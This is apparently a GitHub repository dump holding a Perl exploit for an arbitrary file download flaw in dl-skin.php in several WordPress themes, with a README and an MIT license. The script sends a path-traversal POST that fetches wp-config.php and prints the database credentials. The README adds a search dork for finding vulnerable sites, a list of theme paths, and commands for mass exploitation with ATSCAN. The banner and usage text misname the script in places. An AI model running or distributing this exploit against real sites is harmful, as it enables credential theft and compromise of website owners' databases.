├── README.md ├── WP-dl-skin-exploit.pl └── license.txt /README.md: -------------------------------------------------------------------------------- 1 |

Wordpress AFD dl-skin.php Exploit

2 | 3 | 4 | 5 | 6 | 7 | 11 | 12 |
Screenshots:
8 |

9 |

10 |
13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
DORK:
index of /lib/scripts/dl-skin.php
21 | 22 | 23 | 24 | 25 | 26 | 40 | 41 |
Vulnerable themes:
27 | wp-content/themes/infocus/lib/scripts/
28 | wp-content/themes/elegance/lib/scripts/
29 | wp-content/themes/awake/lib/scripts
30 | wp-content/themes/fusion/lib/scripts/
31 | wp-content/themes/Minamaze_Pro/lib/scripts/
32 | wp-content/themes/construct/lib/scripts/
33 | wp-content/themes/persuasion/lib/scripts/
34 | wp-content/themes/dejavu/lib/scripts/
35 | wp-content/themes/versatile/lib/scripts/
36 | wp-content/themes/Melos_Pro/lib/scripts/
37 | wp-content/themes/barracudafx/lib/scripts/
38 | wp-content/themes/mesocolumn/lib/scripts/
39 |
42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 |
EXPLOITATION:
Get wp-config.php file
50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 |
USAGE:
perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php
58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 |
ATSCAN MASS USAGE:
atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET"
66 | 67 | 68 | -------------------------------------------------------------------------------- /WP-dl-skin-exploit.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | ############################################ 3 | ############################################ 4 | ## WORDPRESS AFD dl-skin.php Exploit 5 | ## CODED BY ALI MEHDIOUI 6 | ## ALISAM TECHNOLOGY TEAM 7 | ############################################ 8 | ## VULNERABLE THEMES: 9 | ## wp-content/themes/awake/ 10 | ## wp-content/themes/elegance/ 11 | ## wp-content/themes/barracudafx/ 12 | ## wp-content/themes/fusion/ 13 | ## wp-content/themes/dejavu/ 14 | ## wp-content/themes/infocus/ 15 | ## wp-content/themes/Minamaze_Pro/ 16 | ## wp-content/themes/Melos_Pro/ 17 | ## wp-content/themes/versatile/ 18 | ## wp-content/themes/construct/ 19 | ## wp-content/themes/persuasion/ 20 | ## wp-content/themes/mesocolumn/ 21 | ## [+][+] 22 | ## USAGE: 23 | ## perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php 24 | ## [+][+] 25 | ## ATSCAN MASS USAGE: 26 | ## atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET" 27 | 28 | ## DORKS 29 | ## DORK: index of /lib/scripts/dl-skin.php 30 | ############################################ 31 | ############################################ 32 | use strict; 33 | use warnings; 34 | use FindBin '$Bin'; 35 | use Term::ANSIColor; 36 | use URI::Escape; 37 | use HTML::Entities; 38 | use LWP::UserAgent; 39 | print color 'reset'; 40 | print " 41 | [+]================================================================[+] 42 | [+]--------- Wordpress AFD timthumb-config.php Exploit -----------[+] 43 | [+]-------------- Alisam Technology --------------[+] 44 | [+]------ https://www.fb.com/Forces.des.tempetes.marocaines ------[+] 45 | [+]------ https://www.youtube.com/user/aliartes ------[+] 46 | [+]================================================================[+] 47 | "; 48 | 49 | if (!$ARGV[0]) { print "Usage: php WP-dl-skin.php-exploit.php http://www.site.com/wp-content/themes/THEME NAME/....\n"; exit; } 50 | my $ua = LWP::UserAgent->new; 51 | $ua->timeout(10); 52 | my $URL=$ARGV[0]; 53 | my @error=("Target Vulnerable", "Target Not vulnerable"); 54 | $URL=~s/scripts\/(.*)//s; 55 | $URL=$URL."scripts/dl-skin.php"; 56 | print " SCAN : "; 57 | use HTTP::Request::Common; 58 | $ua = LWP::UserAgent->new; 59 | my $response=$ua->request(POST $URL, ['Content_Type' => 'form-data', '_mysite_download_skin' => '../../../../../wp-config.php']); 60 | if ($response->content=~/DB_NAME/) { 61 | print color 'green'; print "$error[0]\n"; 62 | print color 'green'; print $response->content."\n"; 63 | print color 'reset'; 64 | }else{ 65 | print color 'red'; print "$error[1]\n"; 66 | print color 'reset'; 67 | } 68 | -------------------------------------------------------------------------------- /license.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 Alisam Technology 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | --------------------------------------------------------------------------------